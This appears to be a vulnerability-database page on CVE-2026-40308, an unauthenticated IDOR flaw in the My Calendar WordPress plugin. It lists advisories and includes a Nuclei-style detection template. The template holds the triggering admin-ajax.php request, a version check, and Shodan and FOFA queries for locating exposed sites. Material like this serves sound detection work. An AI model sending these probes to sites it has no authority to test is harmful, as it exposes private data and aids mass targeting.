| Title | Published | Views | Reporter |
|---|---|---|---|
| CVE-2026-40308 | 16 Apr 2026 21:30 | – | attackerkb |
| CVE-2026-40308 | 16 Apr 2026 17:52 | – | circl |
| WordPress plugin My Calendar security vulnerability | 16 Apr 2026 00:00 | – | cnnvd |
| CVE-2026-40308 | 16 Apr 2026 21:30 | – | cve |
| CVE-2026-40308 My Calendar: Unauthenticated Information Disclosure (IDOR) via Multisite switch_to_blog | 16 Apr 2026 21:30 | – | cvelist |
| EUVD-2026-23306 | 16 Apr 2026 21:30 | – | euvd |
| Unauthenticated Information Disclosure (IDOR) via Multisite switch_to_blog in My Calendar | 16 Apr 2026 21:34 | – | github |
| CVE-2026-40308 | 16 Apr 2026 22:16 | – | nvd |
| GHSA-2MVX-F5QM-V2CH Unauthenticated Information Disclosure (IDOR) via Multisite switch_to_blog in My Calendar | 16 Apr 2026 21:34 | – | osv |
| PT-2026-33370 | 16 Apr 2026 00:00 | – | ptsecurity |
```yaml
id: CVE-2026-40308

info:
  name: My Calendar WordPress Plugin - Information Disclosure
  author: theamanrawat
  severity: high
  description: |
    My Calendar WordPress plugin <= 3.7.6 contains an injection vulnerability caused by
    unvalidated user input passed to parse_str() in the mc_ajax_mcjs_action endpoint,
    letting unauthenticated attackers access private events or crash sites via
    switch_to_blog(). The impact depends on whether the site is a WordPress Multisite
    or a Single Site installation.
  impact: |
    Unauthenticated attackers can access private events on multisite or cause
    denial of service on single site installations.
  remediation: |
    Update to version 3.7.7 or later.
  reference:
    - https://github.com/joedolson/my-calendar/security/advisories/GHSA-2mvx-f5qm-v2ch
    - https://nvd.nist.gov/vuln/detail/CVE-2026-40308
  classification:
    cve-id: CVE-2026-40308
    epss-score: 0.00932
    epss-percentile: 0.56312
    cwe-id: CWE-639
  metadata:
    verified: true
    max-request: 2
    vendor: joedolson
    product: my-calendar
    framework: wordpress
    shodan-query: http.html:"/wp-content/plugins/my-calendar/"
    fofa-query: body="/wp-content/plugins/my-calendar/" && title="WordPress"
  tags: cve,cve2026,wordpress,wp-plugin,my-calendar,idor,information-disclosure

# Request 1 fingerprints the plugin and extracts its version from readme.txt;
# request 2 only reports a match when that version is in the affected range.
flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/my-calendar/readme.txt"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "My Calendar"
          - "Stable tag:"
        condition: and
        internal: true

    extractors:
      - type: regex
        name: version
        part: body
        group: 1
        regex:
          - '(?m)Stable tag:\s*([0-9.]+)'
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/wp-admin/admin-ajax.php?action=mcjs_action&behavior=loadupcoming&args&site=1"

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'compare_versions(version, "<= 3.7.6")'
          - 'contains_all(body, "\"success\":1", "response")'
          - 'status_code == 200'
        condition: and
# digest: 4b0a0048304602210090a9e70c1360f66288256592c59b72c140ffcc35c76ae6c5cee669d2c8cd9a4c022100e861ec703949d38000bd7b06f4b81636135e47c333e590a794536802df2fc944:922c64590222798bb761d5b6d8e72950
```